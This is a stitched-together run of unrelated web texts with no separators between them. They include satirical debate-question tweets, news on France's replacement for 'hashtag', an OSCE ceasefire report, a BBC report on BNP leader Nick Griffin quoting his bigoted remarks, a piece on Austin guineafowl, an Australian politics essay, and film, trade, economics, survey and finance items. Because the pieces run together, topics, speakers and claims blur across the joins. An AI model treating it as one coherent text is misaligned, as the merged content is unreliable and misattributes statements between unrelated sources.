Since big game hunts control overpopulation do you support shooting zoo animals ? # MegynKellyDebateQuestions — Count Dante ( @ countdante67 ) August 4 , 2015
# MegynKellyDebateQuestions “ If you could be any animal , who would you choose to hunt and kill you ? ” — heymrmike ( @ heymrmike ) August 4 , 2015
# MegynKellyDebateQuestions : “ 60 % disapprove of Obama , 50 % strongly disapprove . Please use math in a sentence ” pic.twitter.com/MSXP9dk1Nu — Barracks O'Bama ( @ P0TUS ) August 4 , 2015
# MegynKellyDebateQuestions In your opinion , will Beetlejuice appear if you say “ Benghazi ” three times really fast ? — Tim Bartlett ( @ wbllostsoul ) August 4 , 2015
“ Show of hands , how many of you on this stage believe Santa Claus is White ? ” # MegynKellyDebateQuestions — The ReBearded Wonder ( @ DarthWeiner75 ) August 4 , 2015
“ So when God told you to run for President , he spoke in English , right ? ” # MegynKellyDebateQuestions — Shelby Kent-Stewart ( @ ShelbyKentStewa ) August 4 , 2015
# megynkellydebatequestions As President , how would you protect Texas from being invaded by the federal government ? — Greg Woods ( @ diygreg ) August 4 , 2015
# MegynKellyDebateQuestions “ You can get a gun easier than allergy medicines , how will you make it easier to get guns ? ” — Stevie ( @ DeaconessBlues ) August 4 , 2015
God created the Earth in a week . Obama needed 6 years to fix the Economy . How lazy is Obama ? # MegynKellyDebateQuestions — John ( @ linnyitssn ) August 4 , 2015
Donald , if elected , will Americans have toupee more taxes ? # MegynKellyDebateQuestions — Tony Posnanski ( @ tonyposnanski ) August 4 , 2015
# MegynKellyDebateQuestions As President , what will you do to make sure Obama is blamed for the failures of your term ? Bonus : # Benghazi — 10001110101 ( @ SliderZ33 ) August 4 , 2015
“ What place will the Koch Brothers have in your administration , left or right testicle ? ” # MegynKellyDebateQuestions — Rev . Big Baby Huey ( @ RevBigBabyHuey ) August 4 , 2015
Ronald Reagan – Great president , The GREATEST president or vessel through which god spoke ? # MegynKellyDebateQuestions — J-S Mercier ( @ bashturn ) August 4 , 2015
We all know that gay marriage causes Global Warming . What will you do to protect Israel from that ? # MegynKellyDebateQuestions — John ( @ linnyitssn ) August 4 , 2015
# MegynKellyDebateQuestions If elected , what would you do to ensure that Jesus and Santa stay white ? — Atheist Pirate ( @ Atheist_Pirate ) August 4 , 2015
# MegynKellyDebateQuestions Illegal aliens from mexico invaded Roswell in the 1940 's , do they still occupy Area 51 ? How will you handle this ? — JoeyTUSMC ( @ JoeyTusmc ) August 4 , 2015
@ P0TUS “ Will a woman 's right to choose to include both barefoot AND pregnant under your administration ? ” # MegynKellyDebateQuestions — Rev . Big Baby Huey ( @ RevBigBabyHuey ) August 4 , 2015
Seriously , which one of you did god actually choose ? # MegynKellyDebateQuestions — Topher ( @ TopherXXL ) August 4 , 2015
( Visited 37 times , 1 visits today )
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
Quel tweets ! The French Government has guillotined the Twitter term hashtag .
In a continuing battle to stop English words violating their mother tongue , the language gendarmes have decreed the nation must now refer to the global social network icon as mot-diese .
Teachers and the media are under orders to adopt it – and steer clear of using the English word .
The outlawing of hashtag is the latest in a stream of desperate bids by the nation 's stuffy Académie française authority to keep the language pure .
Already , the French culture ministry has a huge list of English words on its website which it fears are in danger of slipping into common French usage .
These include : email , blog , supermodel , take-away , parking , weekend and low-cost airline .
The site also features obscure terms that nobody would want to steal , such as detachable motor caravan and multifunctional industrial building .
The blacklist of vocabulary runs for 65 pages .
Scientists are told to no longer refer to “ serial analysis of gene expression ” and “ suppression subtractive hybridization ” .
Television sports commentators are even urged to stop using the words coach or corner during football matches , despite the fact that all its terms were invented in English by English speakers . They should instead say entraineur and coup de pied de coin .
The Official Journal , which publishes the French edicts , now says : “ The English term hashtag should wherever possible be replaced with the French term mot-diese . ”
Officials went into meltdown after a government report said Anglo-Saxon culture 's trend towards global domination had caused a “ deep crisis ” .
For the list see http : //franceterme.culture.fr and click “ rechercher ” .
This report is provided for the media and general public
On 17 February , the SMM went to the headquarters of the JCCC , temporarily relocated to Soledar ( 77km north of Donetsk , government-controlled ) . The SMM was present at four video conference sessions with the Russian General formerly representing the Russian Federation at the JCCC , the Russian Major-General , Representative of the Armed Forces of the Russian Federation to the JCCC and the Ukrainian Major-General , Head of the Ukrainian side to the JCCC and members of the “ Donetsk People 's Republic ” ( “ DPR ” ) and the “ Lugansk People 's Republic ” ( “ LPR ” ) . Representatives of the Presidential Administration and the General Staff of the Ukrainian Armed Forces were also present .
Negotiations focussed on the SMM 's access to Debaltseve ( 55km north-east of Donetsk ) , and continued throughout the day . The SMM encouraged each side to confirm that they were willing and able to cease fire , in line with their earlier agreements . Some participants estimated that about 2,500 civilians remained in Debaltseve . SMM reminded participants of the likelihood of civilian casualties , if they failed to honour the agreement to the ceasefire . The representative of the General Staff of the Ukrainian Armed Forces said the Ukrainian Armed Forces were willing to cease fire . The “ DPR ” and “ LPR ” were not willing to do so . The SMM noted that this refusal to cease fire was in clear contravention to their earlier agreement to do so and amounted to a restriction of the Mission 's freedom of movement .
The SMM will return to Soledar on 18 February to continue to pursue the possibility of conducting a patrol to Debaltseve .
Submitted by Mike Krieger via Liberty Blitzkrieg blog ,
We need to hang him on the courthouse square as soon as we get a hold of him . – Former vice chairman of the Senate Select Committee on Intelligence , Saxby Chambliss , on Edward Snowden
It appears the past few days have represented a sort of coming out party for formerly powerful players in the U.S. government to showcase their fascist tendencies . Earlier today , I highlighted General Wesley Clark 's clear suggestion during a MSNBC interview that Americans who are “ disloyal ” should be forcibly separated from the “ normal ” general population through the use of WWII style internment camps .
In the latest display , video has emerged of former Republican Senator , and ex-vice chairman of the Senate Select Committee on Intelligence , saying that Edward Snowden should be hanged in the courthouse square . What ever happened to fair trials ?
From the Hill :
The U.S. should publicly hang leaker Edward Snowden if and when he falls into the government 's hands , according to the former top Republican on the Senate Intelligence Committee . “ We need to hang him on the courthouse square as soon was we get our hands on him , ” retired Sen. Saxby Chambliss ( R-Ga. ) — who served as vice chairman of the powerful intelligence panel before stepping down from Congress last year — said during an appearance at the University of Georgia this month . “ I hope none of you have any sympathy for him , ” he told students at the Terry College of Business .
You tell 'em Saxby !
It 's as if these guys are publicly auditioning for a top job within the financial-miliatry-cyber-industrial complex .
Please turn on JavaScript . Media requires JavaScript to play . Advertisement British National Party leader Nick Griffin has used his Question Time appearance to criticise Islam and defend a past head of the Ku Klux Klan . He also told a largely hostile audience that Winston Churchill would be a BNP supporter if he were alive , and insisted : `` I am not a Nazi '' . Anti-fascist protesters scuffled with police outside BBC TV Centre in west London before the show was filmed . More than eight million people watched the show , triple its typical audience . At its peak , 8.2 million people tuned into the BBC1 show . Welsh Secretary Peter Hain said the BBC had legitimised the BNP 's `` racist poison '' by inviting its leader onto the show but the corporation defended the move , saying it had a duty to be impartial . One of the panellists , Justice Secretary Jack Straw , said it had been a `` catastrophic week for the BNP because for the first time the views of the BNP have been properly scrutinised '' . And following the programme , other panellists said Mr Griffin had been exposed . Baroness Warsi , the Conservative peer and shadow communities minister , said `` he does not have any political views other than a hatred for certain groups of people '' . QUESTION TIME Watch the programme again
Question Time on iPlayer Liberal Democrat home affairs spokesman Chris Huhne said : `` I certainly think that his credibility - for anybody who sees the show - is going to be seriously damaged by his performance . '' Mr Griffin told BBC News too much of the programme had been a `` beat up Nick Griffin programme instead of Question Time '' . He added that of the 25 or so allegations made against him in the programme - he was only allowed to answer four or five of them and that was `` grossly unfair '' . And a BNP spokesman complained that the programme had focused entirely on Mr Griffin 's views and ignored newsworthy stories such as the postal strike , Afghanistan and Europe . `` This was not a normal Question Time , '' he told BBC Radio 4 's Today programme . `` It was 'let 's have a go at Nick Griffin time ' . '' 'Aborigines here ' The BNP leader was booed at the start of the recording and accused of trying to `` poison politics '' as he was attacked by fellow panellists and the audience . During the show the panel covered topics including whether it was fair for the BNP to `` hijack '' images of Winston Churchill , whether immigration policy had fuelled the BNP 's popularity and whether Mr Griffin 's appearance was an early Christmas present for the party . He was asked by a member of the audience about why he had described Islam as a `` wicked and vicious faith '' . Mr Griffin said the religion had its `` good points ... it would n't have let the banks run riot '' but it did not fit in with `` the fundamental values of British society , free speech , democracy and equal rights for women '' . He was scrutinised and challenged along with the other panellists heavily by the audience , that was right in our view
Mark Byford
BBC deputy director general
Profile : Nick Griffin Analysis : How did he do ? Newspapers on Griffin appearance Reaction to Griffin 's performance Angry scenes outside BBC His references to Britain 's `` indigenous people '' prompted other members of the panel to challenge him to say he meant white people . Mr Griffin said the colour was `` irrelevant '' and said Mr Straw would not dare go to New Zealand and tell a Maori he was not `` indigenous '' . `` We are the aborigines here , '' he claimed . Mr Straw said what distinguished the BNP from other parties was that other parties `` have a moral compass ... Nazism did n't and neither I 'm afraid of does the BNP . '' The BNP leader insisted his views had been widely misrepresented in the media and denied a string of statements attributed to him , including a quote from 2006 in which he said `` Adolf went a bit too far '' . `` I am not a Nazi and never have been , '' he said , adding : `` I am the most loathed man in Britain in the eyes of Britain 's Nazis . '' He admitted sharing a platform with former Ku Klux Klan leader David Duke - but described him as `` always totally non-violent '' . He said he had been trying to win over `` youngsters '' Duke was trying to `` lead astray '' . Challenged on his views on civil partnership , he said : `` I said that a lot of people find the sight of two grown men kissing in public really creepy . I understand that homosexuals do n't understand that but that 's how a lot of us feel , Christians feel that way , Muslims , all sorts of people . '' Audience challenge Asked about a quote attributed to him in which he equated six million deaths in the Holocaust with the flat earth theory he replied that `` European law '' stopped him explaining . `` I ca n't tell you why I used to say those things any more than I can tell you why I have changed my mind , '' he said . The justice secretary said when anybody put a specific quotation to Mr Griffin he tried to `` wriggle out of it '' . HAVE YOUR SAY If Nick Griffin 's appearance on Question Time has the ultimate effect of shaking the 'great ' british public free of their political apathy and encourages them to ask probing questions , then his appearance will be a good thing John Walker , Belfast Asked whether immigration policy had fuelled the BNP , Mr Straw said he did not think it had and said he thought the BNP had been boosted by discontent with the main parties over issues like expenses . But Baroness Warsi said politicians had a responsibility to take on the BNP on the issue of immigration : `` Many people who vote for the BNP are not racist and therefore what we have to do is go out and say to these people as mainstream political parties we are prepared to listen . '' Mr Griffin blamed the `` political elite '' for imposing `` an enormous multicultural experiment on the British people '' . But Mr Griffin was challenged by several black and Asian members of the audience . One man asked Mr Griffin : `` Where do you want me to go ? I love this country , I 'm part of this country . '' Protests While the programme was being recorded the anti-BNP protest continued . The Metropolitan Police say six protesters were arrested and three police officers injured in the protests . Mr Griffin accused the protesters of `` attacking the rights of millions of people to listen to what I 've got to say and listen to me being called to account by other politicians '' . Please turn on JavaScript . Media requires JavaScript to play . But Weyman Bennett from Unite Against Fascism accused the BBC of `` rolling out the red carpet '' to Mr Griffin and said his appearance on the flagship discussion programme `` will lead to the growth of a fascist party '' and promote violence against ethnic minorities . About 25 people managed to get through the gates and run towards the BBC building when security guards opened them to let in a car . A few minutes later they were led , dragged or carried back outside . There were also protests outside BBC buildings in Bristol , Liverpool , Nottingham , Glasgow and Belfast . Welsh Secretary Mr Hain , who had tried to stop the broadcast , said : `` The BBC should be ashamed of single-handedly doing a racist , fascist party the biggest favour in its grubby history . '' BBC Deputy Director General Mark Byford said it had been `` appropriate '' to invite Mr Griffin to appear given the support the BNP received in the last European elections when it gained its first Euro MPs . He said : `` He was scrutinised and challenged along with the other panellists heavily by the audience , that was right in our view . `` It would have been quite wrong for the BBC to have said 'yes , you are allowed to stand in elections , yes you have a level of support that now meets the threshold but the BBC does n't think that you should be on ' . ''
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon What are these ? E-mail this to a friend Printable version
A walk down Swearingen Drive between Parkfield and Carshalton on a pleasant spring day will usually reveal a very unusual sight , at least for an Austin neighborhood – a flock of nineteen rather large , teardrop-shaped birds , gray with tiny white spots , with single , brown horns on their bare , white heads and red wattles on their cheeks , running around on the ground and making odd sounds . Those of us possessing a familiarity with old southern farms might recognize them as Guineahens , or more simply , Guineas . Being an avid birder , I noticed them with surprise the first time I drove down Swearingen Drive in 1992 . What were these birds doing in an Austin neighborhood ?
Guineafowl ( or , more properly , the Helmeted Guineafowl , scientific name Numidea meleagris ) are native to Africa south of the Sahara Desert . The name “ Meleagris ” is actually the old Greek word for Guineafowl , as these African birds were well-known to the ancient Greeks , and have been a popular menu item ever since , particularly in southern Europe . As with many birds that humans have found good to eat , Guineas have been widely introduced into other areas of the world , particularly southern France and the West Indies . So when the Spanish explorers of the new world first encountered American turkeys , they originally called them “ Meleagris , ” mistaking them for Guineafowl .
How did these birds end up in a twenty-first century neighborhood in north Austin ? To answer that , we need to delve into a little bit of the history of Gracywoods .
In the 1940 's , what is now north Austin was a collection of dairy farms located on the westernmost extensions of blackland prairie just east of the Balcones fault , the geological formation that marks the eastern edge of the Texas hill country . Gracywoods is located on what used to be the old Gracy Farm . About a mile to the south was the Kramer Farm . In the 1940 's , the Kramer Farm had a flock of Guineafowl .
One night in the 1940 's , a strong thunderstorm blew some of the Kramer Guineas up to the Gracy Farm . After the soggy and disoriented birds dried out and had a look around , these displaced Guineas decided they liked the old oaks on what is now Swearingen Drive . This location has remained their home ever since as the city of Austin grew up around them . Who owns these Gracywoods Guineas ? The truth is that no one has owned this flock of birds since they left the Kramer farm . The flock has become what is called “ naturalized. ” But these rather comical-looking birds have made some friends , first with the Gracy family , and later with some of the neighbors of Gracywoods , who have advocated that they remain a part of the neighborhood .
The Gracywoods Guineas roost every night in the branches of one of the live oaks along Swearingen , where they are protected from predators on the ground as well as from rain , wind , and cold . Early every morning , they set off to roam the neighborhood , eating both plant and animal material , including many insects that are damaging to lawns and gardens . They are particularly fond of ticks and June bug larva .
Guineas are always found in flocks . In Africa , where there are an abundance of fierce predators , the flock 's multiple eyes , warning cackles , and large numbers help protect them from the many dangers . They are particularly good at driving away snakes ; in Africa , this includes large cobras ! In Gracywoods , raccoons sometimes try to snatch a Guinea off an oak limb at night , in which case the Guineas raise a ruckus and the raccoon usually leaves hungry . On particularly dark winter nights , Great Horned Owls might attempt to procure a Guinea feast , but adult Guineas are usually a little too feisty for them . The only ground predator that has much of a chance at catching an adult Guinea would be a large , fast dog . In the City of Austin , dogs are required by law to be restrained ( on a leash or behind a fence ) at all times , and since dogs are very poor at climbing trees , successful dog attacks on the Guineas are rare . And while they would rather run away , in a pinch , Guineas can still fly pretty well .
Currently there are about 19 Guineas in the Gracywoods flock . Every spring , one or more of the females will lay up to twenty eggs , usually in one nest . The young chicks are mobile at birth , but due to the many predators of young chicks ( hawks , owls , snakes , cats , and foxes ) , few survive to become adults .
From time to time , some of our neighbors have complained about the Guineas . It is true that they may dig a bit in a garden or a yard . They do eat some types of plants , and they can be a little noisy at times . If they roost in an oak that happens to be over a car , there is the inevitable bird mess that can be a nuisance .
A number of years ago , some of these complaints resulted in a decision by the city government that stated that , although the birds were not native , they were essentially “ wild , ” thus earning the protection of the Austin City statute that protects all wild birds . Because of this , the new “ Enclave at Gracywoods ” development that has been built on the last remaining wild land around the old Gracy farmhouse , and as a consequence , the last wild Guinea habitat , has actually used the Gracywoods Guineas as a selling point to entice new homeowners .
The Guineas have their positive points , also . While there are no longer any venomous snakes in Gracywoods , we do have Lindheimer 's rat snake in our neighborhood . These snakes can get rather large ( over five feet long ) , but they are harmless and can actually be quite beneficial as they eat mostly rats and mice . Nevertheless , many of our residents do not like snakes , and that includes the Guineas , who will drive away any and every snake they find , if they do n't eat it first . And as mentioned earlier , Guineas eat lots of insects , including ticks . And they do help to keep Gracywoods at least a little bit “ weird , ” or , more accurately , interesting .
As a whole , the neighborhood supports the presence of the Guineas , and they are a particular favorite of children and families out for a Sunday walk . They even have a special “ no speeding ” sign of their own , which appears to have helped slow traffic down on Swearingen Drive . Can Guineas and humans live together in an Austin neighborhood ? They 've been doing it now for almost thirty years !
It 's the end of politics as we know it , and I feel fine
Updated
How much longer are we going to go on imagining things will get better if only Labor or the Coalition could get their acts together or find the right leader ? Folks , it 's over . We need to reinvent the way we do politics , writes Tim Dunlop .
It 's time we faced it : the image we have of democratic politics as one where major parties use the power of office to generate a viable and coherent platform for governing in the name of a majority of citizens is dead .
The divisions that caused Labor 's leadership ructions , and that are causing the current unrest within the Coalition , are not some passing phase that the parties are going through and that can all be put to rest if they could just find the right leader to unite them .
They are part of the wider disruption of how we organise our society .
Tony Abbott and Bill Shorten are not the problem , any more than they are the answer : they are the symptoms of a crumbling paradigm . They have risen to the top because the system rewards a particular sort of operator .
Division and mediocrity are not bugs in this system , they are a feature .
This means that most analysis and commentary on political events is starting from the wrong premise , which means , in turn , that we are all being chronically ill-informed .
It 's time we looked at all this much more honestly rather than working from the assumption that what is happening now is some sort of aberration .
How much longer are we going to go on imagining that things will get better if only Labor or the Coalition could get their acts together and we could somehow replicate the `` good old days '' of a Howard , or of Hawke and Keating , or of a Menzies ?
Folks , it 's over .
A re-elected Abbott Government is not going to suddenly be any more viable than the version we currently have .
And if they happen to take over , neither Scott Morrison nor Malcolm Turnbull has the secret sauce to magically turn everything around in way that has eluded Abbott .
Shorten is not going to reinvent the Labor Party and find a way to rule for the right-wing factions , progressive inner-city voters , and conservative suburbanites in a way that any of those factions is likely to approve .
The Greens are not suddenly - or even in the medium term - going to become a viable alternative to the big two .
The Greens and Labor are not suddenly going to work together and deliver unto us an actual unified progressive government instead of the ticky-tacky version that sometimes emerges as a by-product of preferential voting .
No fantasy `` centrist '' coalition or other third party will emerge to square the circle of our broken politics .
It is disruption all the way down , and the sooner we learn to live with that , the happier we are all going to be .
And believe me , that is the direction in which happiness lies : reinventing and adjusting our expectations , not in endlessly trying to hold together the system we have grown up with .
We have to get over the idea that good governance can only come from a major party in control of both houses , a notion that informs many of the assumptions of our political class .
We have to normalise the idea that parliament is a place for actual policy debate and that we would be better served by smaller parties and independents than we are by the faux control of the majors .
( I mean , it is telling that the minority Gillard government - even with a `` hostile '' Senate - achieved more in terms of actual reform than Mr Abbott and his `` landslide '' Government has come close to replicating . )
Look at the issues that currently suck up all the oxygen in our political debates : equal marriage ; renewables ; asylum seekers ; industrial relations ; economic `` reform '' .
They are important issues but they also present us with irreconcilable differences .
Which is fine , as long as we have systems in place that allow for some sort of synthesis .
But we do n't . Instead we have party structures that force members into voting for and supporting positions they do n't actually believe in the name of `` unity '' .
Thus , decent people within the parties are forced to publicly argue for positions they do n't believe in , or they are left to play a dead bat to important matters .
The electorate understands the subterfuge and it infuriates them .
And why would n't it ? It makes we-the-people complicit in the deception and we end up hating the politicians and the system that forces us to choose in this way .
An entrenched `` least bad '' approach is an insane way to do democracy .
The problem in a democracy is n't different points of views ; it is having systems that presume the winner-takes-all . That used to work OK when the nation was more homogenous , but in the globalised , technologised world of today , our current systems are a recipe for gridlock and despair .
Given all this , it is good to see some younger politicians at least trying to rethink things . The book , Two Futures : Australia at a Critical Moment , is an attempt by Labor backbenchers Clare O'Neill and Tim Watts to analyse what ails us .
I genuinely applaud their efforts and some of their ideas are perfectly sensible .
For instance , their proposal for an Online Policy Action Caucus ( OPAC ) sounds worthwhile , but see if you can spot the problem :
All party members could be given the right to establish OPACs that advocate on specific issues ( for example , Labor for Ethical Live Cattle Exports or Labor for Equal Marriage ) , without organisational approval , if they are able to sign up at least fifty existing party members to each group . A special class of membership could then be created to allow members of the general public to join not the Labor Party proper but a specific OPAC , for a nominal fee . OPACs that achieve a predetermined organising goal , such as signing up five thousand members to their group , could have the right to move an amendment to the party platform at the relevant national or state conference . The amendment would then be voted on by elected delegates in the normal way .
Do you see ? The idea is an attempt to work outside the party as a way of encouraging ordinary , politically engaged people to involve themselves in the process .
Good idea .
But the OPAC method is basically admitting that people do n't want to join the Labor Party in order to get things done , but it then tries to shoehorn them into that very structure in order to get something done .
It 's like complaining the vacuum cleaner is too loud so you turn up the telly . Surely it would be much easier - and smarter - to turn off the vacuum cleaner ?
Read that OPAC section again and ask yourself : why exactly do you need the Labor Party ( or any party ) in this scenario , other than because such parties currently control the parliament ?
My point is , if we really want things to improve , the changes we are going to have implement will have to go a lot deeper than adding some technological or procedural innovations to the existing party and parliamentary structures .
At some point , we are going to have to stop turning up the television and simply turn off the bloody vacuum cleaner .
Tim Dunlop is the author of The New Front Page : New Media and the Rise of the Audience . He writes regularly for The Drum and a number of other publications . You can follow him on Twitter .
Topics : government-and-politics , forms-of-government , federal-government
First posted
As one of the most formidable directors/actor partnerships in Hollywood , you 'd think that all it would take for Christopher Nolan to get Tom Hardy on board for a film is a simple phone call , but apparently it 's a bit more complex than that ... especially when it came to Hardy 's role in Dunkirk .
Having written the part for the film 's silent Spitfire hero who guards the grey skies of France from Nazi attacks , Nolan only had one man in mind for the role .
In an interview with USA Today , Nolan said : `` I do n't write with actors in mind , because I think that somewhat does them a disservice . But once it was done , I could only see Tom in it . So I called him and begged ... in a dignified manner . ''
Of course , Chris .
The kind of actor who can turn a long drive down the M40 into a captivating character study ( Locke , 2013 ) , Hardy is at his best when working in a restricted environment . Whether it be behind a mask or the in the tiny cockpit of a makeshift war plane ... or both , as is the case with Dunkirk .
`` We 're in that cockpit with him for the entire film . So it 's about wiping the sweat out of his eyes or whatever , it 's very small scale . There are two feet right around him . I knew he would be interested in that , '' Nolan continued . `` It 's rare to find that and embrace that restriction . By tying his arm around his back and making him do something different , I knew he would have something amazing to bring to that . ''
As expected , Hardy is indeed amazing in the role .
Thanks for begging , Chris .
Russia 's agricultural watchdog Rosselkhoznadzor has suspended deliveries of livestock and beef from Romania because of a mad cow disease outbreak , the watchdog said in a statement on Wednesday .
MOSCOW , August 6 ( RIA Novosti ) – Russia 's agricultural watchdog Rosselkhoznadzor has suspended deliveries of livestock and beef from Romania because of a mad cow disease outbreak , the watchdog said in a statement on Wednesday .
“ Because of an outbreak of Bovine spongiform encephalopathy among livestock in the territory of Romania 's [ northwestern city of ] Cluj , from August 6 , 2014 , temporary limitations on the export of cloven-hoofed livestock , meat , meat-bone , and blood meal , bone-on meat , and their byproducts into Russia will be imposed , ” Rosselkhoznadzor said .
Earlier this week , Saudi Arabia also decided to temporarily suspend cattle imports from Romania after an atypical case of mad cow disease was registered by the National Sanitary Veterinary Authority and Food Safety ( ANSVSA ) Monday .
ANSVSA said the instance of bovine spongiform encephalopathy , or BSE , is an “ isolated case ” in Romania with no other classical or atypical forms reported since 1995 .
Romania exports up to one million cattle annually , mainly to the Netherlands , Italy and Croatia .
Russia 's latest trade ban , which comes following a new round of Western sanctions over the Ukraine crisis , follows a move earlier this month to ban all fruits and vegetables imported from Poland . Moscow has cited numerous licensing breaches .
This is really telling : Donald Trump is finally facing an all-out challenge from conservatives — and it 's coming from the Club for Growth .
And who is the Club for Growth ? It 's the enforcer organization for voodoo economics , for the claim , utterly refuted by all available evidence , that tax cuts for the rich generate miraculous growth . ( High priests in voudou are houngans , hence my headline ) .
As I 've been saying all along , while it 's true that Trump is a blowhard talking nonsense about policy , that 's true of every contender for the GOP nomination . He 's just talking different nonsense . And Trumponomics is , if anything , more sensible than the deep voodoo that has been embraced by Jeb Bush .
Trump is n't a problem for Republicans ; he 's a symptom of the problems Republicans have .
Guilt by Denomination
In religious debates , a common tactic is for the theist to claim that their belief grants them a sense of well being . They claim it makes their day-to-day lives are better and to be without religion , there would be a gaping hole left in them . Well a study by organizational psychologist Darrel Ray , Ed.D and undergraduate Amanda Brown have determined that any ‘ gaping hole ' would have been supported by its own weight in guilt , at least when it comes to sex .
9,500 people fully answered the survey devised by the researchers to determine if their sex lives had changed since leaving religion ( 14,500 people , in all , participated but not all completed the survey ) . What was found is after leaving religion , their feeling of guilt after sex was greatly reduced . As an added bonus , 50 % claimed to have had better sex then they had while being believers . It seems when you do n't believe a magic man in the sky is watching you , you wo n't feel bad about getting it on with your partner .
The survey took samples from 94 countries though the majority came from the United States . The sample sizes came down to 5.1 % from Canada , 4.7 % from the UK , 2.7 % from Australia , and the remaining countries never comprised more than .75 % of the sample group .
What denomination a person held affected their level of guilt rather strongly . Those who came from a more fundamentalist background felt the most relief while more open belief systems such as Unitarianism had the least guilt attached to their sex lives .
It was also found that the kind of sexual behavior people would partake in would remain the same . So losing religion did not lead to new kinds of sex , just more satisfying sex . This is important to note as many who are locked in a faith believe they would become sexual deviants without the aid of their religion .
When asked about their sexual education , it was reported that those from more conservative households were the least likely to be informed , where as the more progressive and especially non-religious tended to be more informed about sexual matters . This did not reduce the age or number of sexual events , as both had approximately the same , just those from non-religious or non-denominational houses were more informed beforehand .
One expected outcome never did show itself . After losing religion , the guilt left behind quickly faded . Most reported there being no long term affects on their sex lives from having been a part of a religion . So we can safely say that it does n't matter how long you have been a believer as once you stop , the sex will always get more rewarding
So the next time a theist claims that religion has improved their lives , you can whip out this study ( hopefully only this study ) and show them the fun you are having without all that guilt .
—————————————————
References :
Sex and Secularism
By Darrel Ray , Ed.D . and Amanda Brown1
IPCpress.com
Three South Indian film industries are struggling to come to terms with the extent to which crime and politics have penetrated their ranks . And as the headlines keep coming , more and more of what goes on in the dark underbellies in the industries are being exposed .
Also read : South Indian actress kidnap case timeline
The first of these was the abduction and rape of an actress who was making a name in the Malayalam film industry in Kerala , also known as Mollywood . The history-sheeter who is the prime accused in the case has implicated a noted star and a filmmaker in the case , laying bare the mafia links people both in front of and behind the camera maintain .
In the case of the Telugu film industry , the needle of suspicion of involvement in narcotic trade has swung towards several Tollywood actors and directors , with one prominent filmmaker being questioned for hours about it .
Either way , the allegations have managed to bring to light the hitherto hidden aspect of seedy deals and often-illegal ongoings that hide behind painted faces and glittering tales in cinema .
The Tamil film industry , or Kollywood , meanwhile is besieged with politics . While Superstar Rajinikanth is dropping heavy hints that he might join electoral politics , Kamal Haasan has also indicated his intentions to join the political fray .
In Mollywood
In Kerala , it all started in February this year when an actress ' vehicle was hijacked by some miscreants who drove her around for a few hours , molested her and videographed her entire ordeal . The immediate uproar was quelled within days when the prime accused in the case — a history-sheeter named Pulsar Suni — was arrested within a week of the incident .
However , even before the police caught hold of him , the name of a Mollywood actor — and a former co-star of the victim — had begun to do the rounds in connection with the case . That was Dileep , who had back then denied any involvement in the case .
It was Pulsar Suni who blew the case wide open , and it was in a manner worthy of many a drama film of Mollywood : He confessed to his cellmate that he had attacked the actress at the behest of a top actor in the industry .
It took the police a little more sleuthing to connect the dots and land at the doorstep of Dileep , who was arrested on July 10 over his involvement in the case . It has been speculated that professional jealousy and personal enmity over relationships were the motive behind the entire plan , which was to blackmail the actress with the videos Pulsar Suni and his cohorts had recorded while molesting the actress .
Dileep 's arrest has blown the lid off not only the existing misogyny in Mollywood — even superstar Mammootty and his films are not immune to them — but also the underworld connections many actors and filmmakers have . What is especially disconcerting is the fact that Dileep has now been found to be in possession of land and properties worth Rs 600 crore , with the Enforcement Directorate expressing an interest in probing how he came to own them .
And that seems to be another of the problems Dileep is already facing . Watch what is troubling him here :
In Tollywood
It has not even been three months since the behemoth that was Baahubali : The Conclusion released , and one of its stars is already under the scanner for his connections to the narcotics ring — even though it is as a consumer — that the Hyderabad Police are cracking down on .
That actor is Subbaraju , who played the bumbling royal turned braveheart Kumara Varma in the SS Rajamouli magnum opus . And he is hardly the only big name from the Telugu film Industry , or Tollywood , to be named by the police as being involved in the large-scale supply and consumption of narcotic substances .
On the radar are stars like Charmme Kaur and Mumaith Khan , as well as filmmaker Puri Jagannadh , who has been questioned extensively in connection with the case . Jagannadh , it may be noted , had worked with Bollywood icon Amitabh Bachchan in the Hindi film Bbuddah ... Hoga Terra Baap , which had also starred Kaur .
Mumaith Khan , meanwhile , is currently appearing on television in the Telugu version of Bigg Boss , the Indian version of Celebrity Big Brother . She , too , has had a small stint in Bollywood , but mostly in item numbers . She is expected to be questioned by the special investigation team probing the drug scandal .
In Kollywood
Actors and film technicians from the Tamil film industry tend to do well in politics . Cases in point : From the highly-successful Jayalalithaa and Karunanidhi to the moderately-successful T Rajender and Vijayakanth .
However , it now seems that Jayalalithaa 's death has left behind a huge void in Tamil Nadu politics that seems to be beckoning none other than superstar Rajinikanth . While he has not announced anything formally yet , enough hints have been dropped that he may enter politics .
And as if Thalaivaa was n't enough , even Kamal Haasan seems to have indicated his intentions to enter politics . Haasan , it may be noted , had earlier hinted that politics had affected the collection of one of his films .
In case of both Rajinikanth and Haasan , they have been receiving challenges from possible political rivals as well as veiled threats of harm from some quarters .
It now remains to be seen which direction each industry goes in order to extricate themselves from their respective problems , and whether those steps are just band-aid solutions or have far-reaching effects that set an example for everybody .
Just after the markets closed on its first day of public trading , Facebook amended its S-1 with a complete prospectus detailing how much stock each underwriter got to sell . Morgan Stanley , the lead-left bank , received 162.1 million shares ( $ 6.15 billion worth ) followed by J.P. Morgan with 84.8 million ( $ 3.22 billion ) , and Goldman Sachs pulled down 63.1 million shares ( $ 2.4 billion ) .
E * Trade and Itaú got the short end of the stick , receiving just $ 80 million in stock . That 's less than any of the other underwriters despite being listed in the middle of the pack in the previous versions of the prospectus . But none of the banks made too much on the Facebook stock . FB shares closed just $ 0.23 above its IPO price this morning . That means Facebook maximized the amount it raised in the offering , but its underwriters did n't receive the massive cash windfall many expected .
New York Mets starting pitcher Livan Hernandez follows through on a pitch in the ninth inning as he pitched the first complete game at CitiField and beat the Washington Nationals in their MLB National League baseball game in New York May 26 , 2009 . REUTERS/Ray Stubblebine
( Reuters ) - The owners of the New York Mets baseball team made about $ 48 million in dealings with swindler Bernard Madoff , court documents showed .
The Mets Limited Partnership , which is connected to the Wilpon family , led by Mets owner Fred Wilpon , deposited $ 522.8 million in two accounts with Madoff and withdrew $ 570.6 million , according to a Monday filing by court-appointed trustee Irving Picard .
The Mets reiterated in a statement that the investments with Madoff have “ no effect on the operations of the New York Mets . ”
Earlier this year , Erin Arvedlund , author of “ Too Good to Be True ” , a book on Madoff , said the Wilpon family would be forced to sell the Mets due to huge losses suffered in the Madoff swindle .
The Mets had said Arvedlund has no knowledge of the team or its finances and repeated previous statements that the team was not for sale .
